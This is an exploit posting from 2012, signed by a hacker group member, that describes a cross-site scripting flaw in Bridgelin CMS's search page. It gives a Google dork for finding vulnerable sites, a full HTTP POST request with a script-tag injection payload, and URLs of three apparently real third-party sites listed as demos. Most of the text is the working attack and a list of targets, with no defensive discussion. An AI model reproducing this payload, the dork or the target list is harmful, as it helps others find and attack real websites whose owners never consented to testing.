Bridgelin CMS suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
6b2c88e99ba7972414713e705bf33aaef5e3fe6ad479d67de1862f32c60f7775
<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
-->
# Exploit Title: Bridgelin Cms Cross Site Scripting Vulnerability
#
# Google Dork: Intext:"Powered BY Bridgelin"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.bridgelin.com/
#
# Tested on: all
#
==================================
Post data ------------------------
http://savouryorkregion.com/search.php
Host: savouryorkregion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://savouryorkregion.com/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
r_search=-+Please+Enter+A+Search+Term&search="><script>alert(0);</script>
D3m0:
http://savouryorkregion.com/search.php
http://www.oftr.ca/search.php
http://sherwoodparkra.com/search.php
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369